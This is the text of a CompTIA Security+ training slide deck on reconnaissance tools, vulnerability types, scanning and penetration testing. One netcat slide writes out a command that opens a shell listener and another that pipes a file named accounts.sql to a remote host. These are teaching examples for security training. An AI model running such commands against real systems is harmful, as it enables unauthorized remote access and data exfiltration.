reflection
Performing Security Assessments
Lesson 3
1
Assess Organizational Security with Network Reconnaissance Tools
Topic 3A
CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
2
2
4.1 Given a scenario, use the appropriate tool to assess organizational security
Syllabus Objectives Covered
CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
3
ipconfig, ping, and arp
Footprinting the network layout and rogue system detection
ipconfig/ifconfig/ip
Report the local IP configuration
ping
Test connectivity with a host
Use a ping sweep to detect live hosts on a subnet
arp
Address Resolution Protocol (ARP) cache
Shows IP to Media Access Control (MAC) address mapping
Detect spoofing (validate MAC of default gateway)
Screenshot used with permission from Microsoft.
CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
4
route and traceroute
route
Show the local routing table
Identify default route and local subnet
Check for suspicious entries
tracert/traceroute
Test the path to a remote host
pathping/mtr
Measure latency
CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
5
IP Scanners and Nmap
Host discovery
Test whether host in IP range responds to probes
Port scan
Test whether TCP or UDP port allows connections
Screenshot used with permission from nmap.org.
CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
6
6
Service discovery
Scan custom TCP/UDP port ranges
Service and version detection
Fingerprinting each port
Protocol
Application/version
OS type
Device type
Service Discovery and Nmap
CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
7
Screenshot used with permission from nmap.org.
netstat and nslookup
netstat
Report port status on local machine
Switches to filter by protocol
Display process name or PID that opened port
nslookup and dig
Query name servers
Zone transfers
Screenshot used with permission from Microsoft.
CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
8
theHarvester
Collate open source intelligence (OSINT)
dnsenum
Collate DNS hosting information, name records, and IP schemas
scanless
Collate results from third-party port scanning sites
curl
Craft and submit protocol requests
Nessus
Perform automated vulnerability scanning
Other Reconnaissance and Discovery Tools
CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
9
9
Packet analysis versus protocol analysis
Sniffer—tool for capturing network frames
Use software to interact with host network driver (libpcap/winpcap)
Mirrored ports/switched port analyzer (SPAN)
Use a test access port (TAP) device to read frames from network media
Placement of sensors
tcpdump
Write to pcap
Read from pcap
Filters
Packet Capture and tcpdump
tcpdump -i eth0 "src host 10.1.0.100 and (dst port 53 or dst port 80)"
CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
10
Packet Analysis and Wireshark
Output panes
Packet list
Packet details (headers and fields)
Packet bytes (hex and ASCII)
Capture and display filters
Coloring rules
Follow TCP Stream
Screenshot used with permission from wireshark.org.
CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
11
Packet Injection and Replay
Packet injection
Crafting spoofed packets
Dsniff, Ettercap, Scapy
hping
Host/port detection and firewall testing
Traceroute
Denial of service (DoS)
tcpreplay
Stream a packet capture through an interface
Sandbox analysis and intrusion detection testing
CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
12
Exploitation Frameworks
Simulate adversary tools for exploitation and backdoor access
Metasploit
Modules to exploit known code vulnerabilities
Couple exploit module with payload
Obfuscate code to evade detection
Sn1Per
Penetration test reporting and evidence gathering
Run automated suites of tests
Other frameworks
Linux, embedded, browser, web/mobile app, cloud, ….
CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
13
Screenshot used with permission from metasploit.com
13
Simple tool capable of very wide range of network tasks
Port scanning and fingerprinting
Command prompt listener over arbitrary port
File transfer over arbitrary port
Netcat
echo "head" | nc 10.1.0.1 -v 80
nc -l -p 666 -e cmd.exe
type accounts.sql | nc 10.1.0.192 6666
CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
14
14
Organizational Security with Network Reconnaissance Tools
CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
15
Review Activity
Assisted Labs
Scanning and Identifying Network Nodes
Intercepting and Interpreting Network Traffic with Packet Sniffing Tools
CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
16
Lab Activity
Explain Security Concerns with General Vulnerability Types
Topic 3B
CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
17
17
1.6 Explain the security concerns associated with various types of vulnerabilities
Syllabus Objectives Covered
CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
18
Software Vulnerabilities and Patch Management
Exploits for faults in software code
Applications
Different impacts and exploit scenarios
Client versus server apps
Operating system (OS)
Obtain high level privileges
Firmware
PC firmware
Network appliances and Internet of Things devices
Improper or weak patch management
Undocumented assets
Failed updates and removed patches
CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
19
19
Zero-day
Vulnerability is unknown to the vendor
Threat actor develops an exploit for which there is no patch
Likely to be used against high value targets
Legacy platform
Vendor no longer releases security patches
Zero-day and Legacy Platform Vulnerabilities
CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
20
Default settings
Vendor may not release product in a default-secure configuration
Unsecured root accounts
Threat actor will gain complete control
Limit ability to login as superuser
Open permissions
Configuration errors allowing unauthenticated access
Allowing write access when only read access is appropriate
Weak Host Configurations
CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
21
21
Weak Network Configurations
Open ports and services
Restrict using an access control list
Disable unnecessary services or block ports
Block at network perimeter
Unsecure protocols
Cleartext data transmissions are vulnerable to snooping and eavesdropping
Weak encryption
Storage and transport encryption
Key is generated from a weak password
Cipher has weaknesses
Key distribution is not secure
Errors
Error messages that reveal too much information
CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
22
Data breaches and data exfiltration impacts
Data breach is where confidential data is read or transferred without authorization
Data exfiltration is the methods and tools by which an attacker transfers data without authorization
Identity theft
Abuse of data from privacy breaches
Data loss and availability loss impacts
Availability is also a critical security property
Financial and reputation impacts
Impacts from Vulnerabilities
CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
23
23
Supply chains
Due diligence
Weak links
Vendor management
Process for selecting suppliers and evaluating risks
System integration
Lack of vendor support
Outsourced code development
Data storage
Cloud-based versus on-premises risks
Third-Party Risks
CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
24
24
Security Concerns with General Vulnerability Types
CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
25
Review Activity
Summarize Vulnerability Scanning Techniques
Topic 3C
CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
26
26
1.7 Summarize the techniques used in security assessments
Syllabus Objectives Covered
CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
27
Security Assessment Frameworks
Methodology and scope for security assessments
NIST SP 800-115
Testing
Examining
Interviewing
Vulnerability assessment versus threat hunting and penetration testing
Vulnerability assessments can use a mix of manual procedures and automated scanning tools
CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
28
Vulnerability Scan Types
Automated scanners configured with list of known vulnerabilities
Network vulnerability scanner
Configured with tests for most types of network hosts
Focused on scanning OS plus some desktop and server applications
Application and web application scanners
Configured with application-specific tests
Screenshot used with permission from Greenbone Networks (openvas.org).
CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
29
Common Vulnerabilities and Exposures
Vulnerability feed/plug-in/test
Security Content Automation Protocol (SCAP)
Mechanism for updating scanner via feed
Common identifiers
Common Vulnerabilities and Exposures (CVE)
Common Vulnerability Scoring System (CVSS)
| Score | Description |
| 0.1+ | Low |
| 4.0+ | Medium |
| 7.0+ | High |
| 9.0+ | Critical |
CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
30
Intrusive versus Non-intrusive Scanning
Remote scanning versus agent-based scanning
Non-intrusive scanning
Passively test security controls
Scanners attach to network and only sniff traffic
Possibly some low-interaction with hosts (port scanning/banner grabbing)
Intrusive/active scanning
Establish network session
Agent-based scan
Exploitation frameworks
Highly intrusive/risk of system crash
Used with penetration testing
CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
31
Credentialed versus Non-credentialed Scanning
Non-credentialed
Anonymous or guest access to host only
Might test default passwords
Credentialed
Scan configured with logon
Can allow privileged access to configuration settings/logs/registry
Use dedicated account for scanning
CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
32
Screenshot used with permission from Greenbone Networks (openvas.org).
False Positives, False Negatives, and Log Review
Analyzing and validating scan report contents
False positives
Scanner identifies a vulnerability that is not actually present
False negatives
Scanner fails to identify a vulnerability
Review logs to confirm results
CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
33
Screenshot used with permission from Greenbone Networks (openvas.org).
Configuration Review
Lack of controls
Security controls that should be present but are not (or are not functioning)
Misconfiguration
Settings deviate from template configuration
Driven by templates of configuration settings
Open Vulnerability and Assessment Language (OVAL)
Extensible Configuration Checklist Description Format (XCCDF)
Compliance-based templates available in many products
Screenshot used with permission from Microsoft.
CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
34
Use log and threat data to search for IoCs
Advisories and bulletins
Plan threat hunting project in response to newly discovered threat
Intelligence fusion and threat data
Use security information and event management (SIEM) and threat data feed to automate searches
Maneuver
Consider possibility of alerting adversary to the search
Use techniques that will give positional advantage
Threat Hunting
CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
35
35
Vulnerability Scanning Techniques
CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
36
Review Activity
Assisted Labs
Analyzing the Results of a Credentialed Vulnerability Scan
CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
37
Lab Activity
Explain Penetration Testing Concepts
Topic 3D
CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
38
38
1.8 Explain the techniques used in penetration testing
Syllabus Objectives Covered
CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
39
Penetration Testing
Pen test or ethical hacking
Verify threat
Identify vulnerability and the vector by which it could be exploited
Bypass security controls
Identify lack of controls or ways to circumvent existing controls
Actively test security controls
Examine weaknesses that render controls ineffective
Exploit vulnerabilities to prove threat exists (“pwned”)
Active and highly intrusive techniques, compared to vulnerability assessment
CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
40
Rules of Engagement
Agreement for objectives and scope
Authorization to proceed from system owner and affected third-parties
Attack profile
Black box (unknown environment)
White box (known environment)
Gray box (partially known environment—to model insider threat agents, for instance)
Bug bounty programs
CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
41
Red team
Performs the offensive role
Blue team
Performs the defensive role
White team
Sets the rules of engagement and monitors the exercise
Purple team
Exercise set up to encourage collaboration
Red and blue teams share information and debrief regularly
Might be assisted by a facilitator
Exercise Types
CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
42
42
Passive and Active Reconnaissance
Pen testing and kill chain attack life cycle
Reconnaissance phase
Passive techniques unlikely to alert target
Active techniques are detectable
Open Source Intelligence (OSINT)
Social engineering
Footprinting
War driving
Drones/unmanned aerial vehicle (UAV) and war flying
CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
43
43
Pen Test Attack Life Cycle
Initial exploitation
Obtain a foothold via an exploit
Persistence
Establish a command & control backdoor
Reconnect across host shut down/user log off events
Privilege escalation
Internal reconnaissance
Gain additional credentials and compromise higher privilege accounts
Lateral movement
Compromise other hosts
Pivoting
Access hosts with no direct remote connection via a pivot host
Actions on objectives
Cleanup
CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
44
Penetration Testing Concepts
CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
45
Review Activity
Summary
Lesson 3
CompTIA Security+ Lesson 3 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
46
46